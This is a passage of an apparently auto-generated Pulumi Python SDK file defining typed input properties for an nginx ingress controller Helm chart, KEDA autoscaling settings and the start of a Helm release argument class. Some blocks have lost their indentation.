    def extra_args(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Additional command line arguments to pass to nginx-ingress-controller E.g. to specify the default SSL certificate you can use `default-ssl-certificate: "<namespace>/<secret_name>"`.
        """
        return pulumi.get(self, "extra_args")

    @extra_args.setter
    def extra_args(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        """Set ``extra_args``."""
        pulumi.set(self, "extra_args", value)
    @property
    @pulumi.getter(name="extraContainers")
    def extra_containers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]:
        """
        Additional containers to be added to the controller pod. See https://github.com/lemonldap-ng-controller/lemonldap-ng-controller as example.
        """
        return pulumi.get(self, "extra_containers")

    @extra_containers.setter
    def extra_containers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]):
        """Set ``extra_containers``."""
        pulumi.set(self, "extra_containers", value)
    @property
    @pulumi.getter(name="extraEnvs")
    def extra_envs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]:
        """
        Additional environment variables to set.
        """
        return pulumi.get(self, "extra_envs")

    @extra_envs.setter
    def extra_envs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]):
        """Set ``extra_envs``."""
        pulumi.set(self, "extra_envs", value)
    @property
    @pulumi.getter(name="extraInitContainers")
    def extra_init_containers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]:
        """
        Containers, which are run before the app containers are started. - name: init-myservice image: busybox command: ['sh', '-c', 'until nslookup myservice; do echo waiting for myservice; sleep 2; done;']
        """
        return pulumi.get(self, "extra_init_containers")

    @extra_init_containers.setter
    def extra_init_containers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]):
        """Set ``extra_init_containers``."""
        pulumi.set(self, "extra_init_containers", value)
    @property
    @pulumi.getter(name="extraVolumeMounts")
    def extra_volume_mounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]:
        """
        Additional volumeMounts to the controller main container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
        """
        return pulumi.get(self, "extra_volume_mounts")

    @extra_volume_mounts.setter
    def extra_volume_mounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]):
        """Set ``extra_volume_mounts``."""
        pulumi.set(self, "extra_volume_mounts", value)
    @property
    @pulumi.getter(name="extraVolumes")
    def extra_volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]:
        """
        Additional volumes to the controller pod. - name: copy-portal-skins emptyDir: {}
        """
        return pulumi.get(self, "extra_volumes")

    @extra_volumes.setter
    def extra_volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]):
        """Set ``extra_volumes``."""
        pulumi.set(self, "extra_volumes", value)
    @property
    @pulumi.getter(name="healthCheckPath")
    def health_check_path(self) -> Optional[pulumi.Input[str]]:
        """
        Path of the health check endpoint. All requests received on the port defined by the healthz-port parameter are forwarded internally to this path.
        """
        return pulumi.get(self, "health_check_path")

    @health_check_path.setter
    def health_check_path(self, value: Optional[pulumi.Input[str]]):
        """Set ``health_check_path``."""
        pulumi.set(self, "health_check_path", value)
    # NOTE: 'heath' (sic) — the misspelling matches the generated schema
    # property name ("heathCheckHost"); renaming it would break the interface.
    @property
    @pulumi.getter(name="heathCheckHost")
    def heath_check_host(self) -> Optional[pulumi.Input[str]]:
        """
        Address to bind the health check endpoint. It is better to set this option to the internal node address if the ingress nginx controller is running in the hostNetwork: true mode.
        """
        return pulumi.get(self, "heath_check_host")

    @heath_check_host.setter
    def heath_check_host(self, value: Optional[pulumi.Input[str]]):
        """Set ``heath_check_host``."""
        pulumi.set(self, "heath_check_host", value)
@property
@pulumi.getter(name="hostNetwork")
def host_network(self) -> Optional[pulumi.Input[bool]]:
"""
Required for use with CNI based kubernetes installations (such as ones set up by kubeadm), since CNI and hostport don't mix yet. Can be deprecated once https://github.com/kubernetes/kubernetes/issues/23920 is merged.
"""
return pulumi.get(self, "host_network")
@host_network.setter
def host_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "host_network", value)
@property
@pulumi.getter(name="hostPort")
def host_port(self) -> Optional[pulumi.Input['ControllerHostPortArgs']]:
"""
Use host ports 80 and 443. Disabled by default.
"""
return pulumi.get(self, "host_port")
@host_port.setter
def host_port(self, value: Optional[pulumi.Input['ControllerHostPortArgs']]):
pulumi.set(self, "host_port", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Optionally customize the pod hostname.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "hostname", value)
    # Controller container image settings; structure is defined by ControllerImageArgs.
    @property
    @pulumi.getter
    def image(self) -> Optional[pulumi.Input['ControllerImageArgs']]:
        return pulumi.get(self, "image")

    @image.setter
    def image(self, value: Optional[pulumi.Input['ControllerImageArgs']]):
        pulumi.set(self, "image", value)

    @property
    @pulumi.getter(name="ingressClassByName")
    def ingress_class_by_name(self) -> Optional[pulumi.Input[bool]]:
        """
        Process IngressClass per name (additionally as per spec.controller).
        """
        return pulumi.get(self, "ingress_class_by_name")

    @ingress_class_by_name.setter
    def ingress_class_by_name(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "ingress_class_by_name", value)

    @property
    @pulumi.getter(name="ingressClassResource")
    def ingress_class_resource(self) -> Optional[pulumi.Input['ControllerIngressClassResourceArgs']]:
        """
        This section refers to the creation of the IngressClass resource. IngressClass resources are supported since k8s >= 1.18 and required since k8s >= 1.19
        """
        return pulumi.get(self, "ingress_class_resource")

    @ingress_class_resource.setter
    def ingress_class_resource(self, value: Optional[pulumi.Input['ControllerIngressClassResourceArgs']]):
        pulumi.set(self, "ingress_class_resource", value)

    @property
    @pulumi.getter
    def keda(self) -> Optional[pulumi.Input['KedaArgs']]:
        """
        Mutually exclusive with hpa autoscaling.
        """
        return pulumi.get(self, "keda")

    @keda.setter
    def keda(self, value: Optional[pulumi.Input['KedaArgs']]):
        pulumi.set(self, "keda", value)

    @property
    @pulumi.getter
    def kind(self) -> Optional[pulumi.Input[str]]:
        """
        DaemonSet or Deployment.
        """
        return pulumi.get(self, "kind")

    @kind.setter
    def kind(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kind", value)

    @property
    @pulumi.getter
    def lifecycle(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs']]:
        """
        Improve connection draining when ingress controller pod is deleted using a lifecycle hook: With this new hook, we increased the default terminationGracePeriodSeconds from 30 seconds to 300, allowing the draining of connections up to five minutes. If the active connections end before that, the pod will terminate gracefully at that time. To effectively take advantage of this feature, the Configmap feature worker-shutdown-timeout new value is 240s instead of 10s.
        """
        return pulumi.get(self, "lifecycle")

    @lifecycle.setter
    def lifecycle(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs']]):
        pulumi.set(self, "lifecycle", value)

    @property
    @pulumi.getter(name="livenessProbe")
    def liveness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
        """
        Liveness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        """
        return pulumi.get(self, "liveness_probe")

    @liveness_probe.setter
    def liveness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
        pulumi.set(self, "liveness_probe", value)

    @property
    @pulumi.getter(name="maxmindLicenseKey")
    def maxmind_license_key(self) -> Optional[pulumi.Input[str]]:
        """
        Maxmind license key to download GeoLite2 Databases https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases.
        """
        return pulumi.get(self, "maxmind_license_key")

    @maxmind_license_key.setter
    def maxmind_license_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maxmind_license_key", value)

    # Metrics exporter configuration; structure is defined by ControllerMetricsArgs.
    @property
    @pulumi.getter
    def metrics(self) -> Optional[pulumi.Input['ControllerMetricsArgs']]:
        return pulumi.get(self, "metrics")

    @metrics.setter
    def metrics(self, value: Optional[pulumi.Input['ControllerMetricsArgs']]):
        pulumi.set(self, "metrics", value)

    # NOTE(review): presumably the chart's PodDisruptionBudget ``minAvailable``
    # value — no docstring in the schema; confirm against the chart's values.yaml.
    @property
    @pulumi.getter(name="minAvailable")
    def min_available(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_available")

    @min_available.setter
    def min_available(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_available", value)

    @property
    @pulumi.getter(name="minReadySeconds")
    def min_ready_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        minReadySeconds to avoid killing pods before we are ready.
        """
        return pulumi.get(self, "min_ready_seconds")

    @min_ready_seconds.setter
    def min_ready_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_ready_seconds", value)

    # Maps to the chart's ``name`` value (no description provided by the schema).
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="nodeSelector")
    def node_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Node labels for controller pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
        """
        return pulumi.get(self, "node_selector")

    @node_selector.setter
    def node_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "node_selector", value)

    @property
    @pulumi.getter(name="podAnnotations")
    def pod_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations to be added to controller pods.
        """
        return pulumi.get(self, "pod_annotations")

    @pod_annotations.setter
    def pod_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "pod_annotations", value)

    @property
    @pulumi.getter(name="podLabels")
    def pod_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        labels to add to the pod container metadata.
        """
        return pulumi.get(self, "pod_labels")

    @pod_labels.setter
    def pod_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "pod_labels", value)

    @property
    @pulumi.getter(name="podSecurityContext")
    def pod_security_context(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]:
        """
        Security Context policies for controller pods.
        """
        return pulumi.get(self, "pod_security_context")

    @pod_security_context.setter
    def pod_security_context(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]):
        pulumi.set(self, "pod_security_context", value)

    # Maps to the chart's ``priorityClassName`` value (no description in the schema).
    @property
    @pulumi.getter(name="priorityClassName")
    def priority_class_name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "priority_class_name")

    @priority_class_name.setter
    def priority_class_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "priority_class_name", value)

    @property
    @pulumi.getter(name="proxySetHeaders")
    def proxy_set_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Will add custom headers before sending traffic to backends according to https://github.com/kubernetes/ingress-nginx/tree/main/docs/examples/customization/custom-headers.
        """
        return pulumi.get(self, "proxy_set_headers")

    @proxy_set_headers.setter
    def proxy_set_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "proxy_set_headers", value)

    @property
    @pulumi.getter(name="publishService")
    def publish_service(self) -> Optional[pulumi.Input['ControllerPublishServiceArgs']]:
        """
        Allows customization of the source of the IP address or FQDN to report in the ingress status field. By default, it reads the information provided by the service. If disable, the status field reports the IP address of the node or nodes where an ingress controller pod is running.
        """
        return pulumi.get(self, "publish_service")

    @publish_service.setter
    def publish_service(self, value: Optional[pulumi.Input['ControllerPublishServiceArgs']]):
        pulumi.set(self, "publish_service", value)

    @property
    @pulumi.getter(name="readinessProbe")
    def readiness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
        """
        Readiness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        """
        return pulumi.get(self, "readiness_probe")

    @readiness_probe.setter
    def readiness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
        pulumi.set(self, "readiness_probe", value)

    # Maps to the chart's ``replicaCount`` value (no description in the schema).
    @property
    @pulumi.getter(name="replicaCount")
    def replica_count(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "replica_count")

    @replica_count.setter
    def replica_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "replica_count", value)

    @property
    @pulumi.getter(name="reportNodeInternalIp")
    def report_node_internal_ip(self) -> Optional[pulumi.Input[bool]]:
        """
        Bare-metal considerations via the host network https://kubernetes.github.io/ingress-nginx/deploy/baremetal/#via-the-host-network Ingress status was blank because there is no Service exposing the NGINX Ingress controller in a configuration using the host network, the default --publish-service flag used in standard cloud setups does not apply.
        """
        return pulumi.get(self, "report_node_internal_ip")

    @report_node_internal_ip.setter
    def report_node_internal_ip(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "report_node_internal_ip", value)

    @property
    @pulumi.getter
    def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
        """
        Define requests resources to avoid probe issues due to CPU utilization in busy nodes ref: https://github.com/kubernetes/ingress-nginx/issues/4735#issuecomment-551204903 Ideally, there should be no limits. https://engineering.indeedblog.com/blog/2019/12/cpu-throttling-regression-fix/
        """
        return pulumi.get(self, "resources")

    @resources.setter
    def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
        pulumi.set(self, "resources", value)

    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input['ControllerScopeArgs']]:
        """
        Limit the scope of the controller.
        """
        return pulumi.get(self, "scope")

    @scope.setter
    def scope(self, value: Optional[pulumi.Input['ControllerScopeArgs']]):
        pulumi.set(self, "scope", value)

    # Controller Service configuration; structure is defined by ControllerServiceArgs.
    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input['ControllerServiceArgs']]:
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: Optional[pulumi.Input['ControllerServiceArgs']]):
        pulumi.set(self, "service", value)
    @property
    @pulumi.getter(name="startupProbe")
    def startup_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
        """
        Startup probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        """
        return pulumi.get(self, "startup_probe")

    @startup_probe.setter
    def startup_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
        pulumi.set(self, "startup_probe", value)

    @property
    @pulumi.getter
    def sysctls(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
        """
        return pulumi.get(self, "sysctls")

    @sysctls.setter
    def sysctls(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "sysctls", value)

    @property
    @pulumi.getter
    def tcp(self) -> Optional[pulumi.Input['ControllerTcpArgs']]:
        """
        Allows customization of the tcp-services-configmap.
        """
        return pulumi.get(self, "tcp")

    @tcp.setter
    def tcp(self, value: Optional[pulumi.Input['ControllerTcpArgs']]):
        pulumi.set(self, "tcp", value)

    @property
    @pulumi.getter(name="terminateGracePeriodSeconds")
    def terminate_grace_period_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        How long to wait for the drain of connections.
        """
        return pulumi.get(self, "terminate_grace_period_seconds")

    @terminate_grace_period_seconds.setter
    def terminate_grace_period_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "terminate_grace_period_seconds", value)

    # NOTE(review): typed as a single TolerationArgs although Kubernetes
    # tolerations are a list; this presumably mirrors the provider schema —
    # confirm upstream before changing the annotation.
    @property
    @pulumi.getter
    def tolerations(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]:
        """
        Node tolerations for server scheduling to nodes with taints Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/.
        """
        return pulumi.get(self, "tolerations")

    @tolerations.setter
    def tolerations(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]):
        pulumi.set(self, "tolerations", value)

    @property
    @pulumi.getter(name="topologySpreadConstraints")
    def topology_spread_constraints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]]]:
        """
        Topology spread constraints rely on node labels to identify the topology domain(s) that each Node is in. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-topology-spread-constraints/.
        """
        return pulumi.get(self, "topology_spread_constraints")

    @topology_spread_constraints.setter
    def topology_spread_constraints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]]]):
        pulumi.set(self, "topology_spread_constraints", value)

    # Analogous to ``tcp`` above (udp-services-configmap customization) —
    # NOTE(review): no description in the schema; confirm against the chart docs.
    @property
    @pulumi.getter
    def udp(self) -> Optional[pulumi.Input['ControllerUdpArgs']]:
        return pulumi.get(self, "udp")

    @udp.setter
    def udp(self, value: Optional[pulumi.Input['ControllerUdpArgs']]):
        pulumi.set(self, "udp", value)

    @property
    @pulumi.getter(name="updateStrategy")
    def update_strategy(self) -> Optional[pulumi.Input['ControllerUpdateStrategyArgs']]:
        """
        The update strategy to apply to the Deployment or DaemonSet.
        """
        return pulumi.get(self, "update_strategy")

    @update_strategy.setter
    def update_strategy(self, value: Optional[pulumi.Input['ControllerUpdateStrategyArgs']]):
        pulumi.set(self, "update_strategy", value)

    @property
    @pulumi.getter(name="watchIngressWithoutClass")
    def watch_ingress_without_class(self) -> Optional[pulumi.Input[bool]]:
        """
        Process Ingress objects without ingressClass annotation/ingressClassName field. Overrides value for --watch-ingress-without-class flag of the controller binary. Defaults to false.
        """
        return pulumi.get(self, "watch_ingress_without_class")

    @watch_ingress_without_class.setter
    def watch_ingress_without_class(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "watch_ingress_without_class", value)
@pulumi.input_type
class KedaScaledObjectArgs:
    """Metadata arguments for the KEDA ScaledObject resource."""

    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Custom annotations for ScaledObject resource.
        """
        # Only persist explicitly supplied values; unset inputs stay absent.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Custom annotations for ScaledObject resource.
        """
        stored = pulumi.get(self, "annotations")
        return stored

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)
@pulumi.input_type
class KedaTriggerArgs:
    """A single KEDA trigger: a trigger ``type`` plus its ``metadata`` mapping."""

    def __init__(__self__, *,
                 metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        # Persist only explicitly supplied arguments, in declaration order.
        for _key, _val in (("metadata", metadata), ("type", type)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter
    def metadata(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "metadata")

    @metadata.setter
    def metadata(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "metadata", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class KedaArgs:
    """KEDA autoscaling configuration (mutually exclusive with hpa autoscaling)."""

    def __init__(__self__, *,
                 api_version: Optional[pulumi.Input[str]] = None,
                 behavior: Optional[pulumi.Input['AutoscalingBehaviorArgs']] = None,
                 cooldown_period: Optional[pulumi.Input[int]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 max_replicas: Optional[pulumi.Input[int]] = None,
                 min_replicas: Optional[pulumi.Input[int]] = None,
                 polling_interval: Optional[pulumi.Input[int]] = None,
                 restore_to_original_replica_count: Optional[pulumi.Input[bool]] = None,
                 scaled_object: Optional[pulumi.Input['KedaScaledObjectArgs']] = None,
                 triggers: Optional[pulumi.Input[Sequence[pulumi.Input['KedaTriggerArgs']]]] = None):
        """
        :param pulumi.Input[str] api_version: apiVersion changes with keda 1.x vs 2.x: 2.x = keda.sh/v1alpha1, 1.x = keda.k8s.io/v1alpha1.
        """
        # Store only the arguments that were actually supplied, preserving
        # the original declaration order of the assignments.
        _supplied = (
            ("api_version", api_version),
            ("behavior", behavior),
            ("cooldown_period", cooldown_period),
            ("enabled", enabled),
            ("max_replicas", max_replicas),
            ("min_replicas", min_replicas),
            ("polling_interval", polling_interval),
            ("restore_to_original_replica_count", restore_to_original_replica_count),
            ("scaled_object", scaled_object),
            ("triggers", triggers),
        )
        for _key, _val in _supplied:
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[pulumi.Input[str]]:
        """
        apiVersion changes with keda 1.x vs 2.x: 2.x = keda.sh/v1alpha1, 1.x = keda.k8s.io/v1alpha1.
        """
        return pulumi.get(self, "api_version")

    @api_version.setter
    def api_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_version", value)

    @property
    @pulumi.getter
    def behavior(self) -> Optional[pulumi.Input['AutoscalingBehaviorArgs']]:
        return pulumi.get(self, "behavior")

    @behavior.setter
    def behavior(self, value: Optional[pulumi.Input['AutoscalingBehaviorArgs']]):
        pulumi.set(self, "behavior", value)

    @property
    @pulumi.getter(name="cooldownPeriod")
    def cooldown_period(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "cooldown_period")

    @cooldown_period.setter
    def cooldown_period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown_period", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="maxReplicas")
    def max_replicas(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "max_replicas")

    @max_replicas.setter
    def max_replicas(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_replicas", value)

    @property
    @pulumi.getter(name="minReplicas")
    def min_replicas(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_replicas")

    @min_replicas.setter
    def min_replicas(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_replicas", value)

    @property
    @pulumi.getter(name="pollingInterval")
    def polling_interval(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "polling_interval")

    @polling_interval.setter
    def polling_interval(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "polling_interval", value)

    @property
    @pulumi.getter(name="restoreToOriginalReplicaCount")
    def restore_to_original_replica_count(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "restore_to_original_replica_count")

    @restore_to_original_replica_count.setter
    def restore_to_original_replica_count(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "restore_to_original_replica_count", value)

    @property
    @pulumi.getter(name="scaledObject")
    def scaled_object(self) -> Optional[pulumi.Input['KedaScaledObjectArgs']]:
        return pulumi.get(self, "scaled_object")

    @scaled_object.setter
    def scaled_object(self, value: Optional[pulumi.Input['KedaScaledObjectArgs']]):
        pulumi.set(self, "scaled_object", value)

    @property
    @pulumi.getter
    def triggers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['KedaTriggerArgs']]]]:
        return pulumi.get(self, "triggers")

    @triggers.setter
    def triggers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['KedaTriggerArgs']]]]):
        pulumi.set(self, "triggers", value)
@pulumi.input_type
class ReleaseArgs:
def __init__(__self__, *,
atomic: Optional[pulumi.Input[bool]] = None,
chart: Optional[pulumi.Input[str]] = None,
cleanup_on_fail: Optional[pulumi.Input[bool]] = None,
create_namespace: Optional[pulumi.Input[bool]] = None,
dependency_update: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
devel: Optional[pulumi.Input[bool]] = None,
disable_crd_hooks: Optional[pulumi.Input[bool]] = None,
disable_openapi_validation: Optional[pulumi.Input[bool]] = None,
disable_webhooks: Optional[pulumi.Input[bool]] = None,
force_update: Optional[pulumi.Input[bool]] = None,
keyring: Optional[pulumi.Input[str]] = None,
lint: Optional[pulumi.Input[bool]] = None,
manifest: Optional[pulumi.Input[Mapping[str, Any]]] = None,
max_history: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
postrender: Optional[pulumi.Input[str]] = None,
recreate_pods: Optional[pulumi.Input[bool]] = None,
render_subchart_notes: Optional[pulumi.Input[bool]] = None,
replace: Optional[pulumi.Input[bool]] = None,
repository_opts: Optional[pulumi.Input['RepositoryOptsArgs']] = None,
reset_values: Optional[pulumi.Input[bool]] = None,
resource_names: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
reuse_values: Optional[pulumi.Input[bool]] = None,
skip_await: Optional[pulumi.Input[bool]] = None,
skip_crds: Optional[pulumi.Input[bool]] = None,
timeout: Optional[pulumi.Input[int]] = None,
value_yaml_files: Optional[pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]]] = None,
values: Optional[pulumi.Input[Mapping[str, Any]]] = None,
verify: Optional[pulumi.Input[bool]] = None,
version: Optional[pulumi.Input[str]] = None,
wait_for_jobs: Optional[pulumi.Input[bool]] = None):
"""
A Release is an instance of a chart running in a Kubernetes cluster.
A Chart is a Helm package. It contains all of the resource definitions necessary to run an application, tool, or service inside of a Kubernetes cluster.
Note - Helm Release is currently in BETA and may change. Use in production environment is discouraged.
:param pulumi.Input[bool] atomic: If set, installation process purges chart on fail. `skipAwait` will be disabled automatically if atomic is used.
:param pulumi.Input[str] chart: Chart name to be installed. A path may be used.
:param pulumi.Input[bool] cleanup_on_fail: Allow deletion of new resources created in this upgrade when upgrade fails.
:param pulumi.Input[bool] create_namespace: Create the namespace if it does not exist.
:param pulumi.Input[bool] dependency_update: Run helm dependency update before installing the chart.
:param pulumi.Input[str] description: Add a custom description
:param pulumi.Input[bool] devel: Use chart development versions, too. Equivalent to version '>0.0.0-0'. If `version` is set, this is ignored.
:param pulumi.Input[bool] disable_crd_hooks: Prevent CRD hooks from, running, but run other hooks. See helm install --no-crd-hook
:param pulumi.Input[bool] disable_openapi_validation: If set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema
:param pulumi.Input[bool] disable_webhooks: Prevent hooks from running.
:param pulumi.Input[bool] force_update: Force resource update through delete/recreate if needed.
:param pulumi.Input[str] keyring: Location of public keys used for verification. Used only if `verify` is true
:param pulumi.Input[bool] lint: Run helm lint when planning.
:param pulumi.Input[Mapping[str, Any]] manifest: The rendered manifests as JSON. Not yet supported.
:param pulumi.Input[int] max_history: Limit the maximum number of revisions saved per release. Use 0 for no limit.
:param pulumi.Input[str] name: Release name.
:param pulumi.Input[str] namespace: Namespace to install the release into.
:param pulumi.Input[str] postrender: Postrender command to run.
:param pulumi.Input[bool] recreate_pods: Perform pods restart during upgrade/rollback.
:param pulumi.Input[bool] render_subchart_notes: If set, render subchart notes along with the parent.
:param pulumi.Input[bool] replace: Re-use the given name, even if that name is already used. This is unsafe in production
:param pulumi.Input['RepositoryOptsArgs'] repository_opts: Specification defining the Helm chart repository to use.
:param pulumi.Input[bool] reset_values: When upgrading, reset the values to the ones built into the chart.
:param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]] resource_names: Names of resources created by the release grouped by "kind/version".
:param pulumi.Input[bool] reuse_values: When upgrading, reuse the last release's values and merge in any overrides. If 'resetValues' is specified, this is ignored
:param pulumi.Input[bool] skip_await: By default, the provider waits until all resources are in a ready state before marking the release as successful. Setting this to true will skip such await logic.
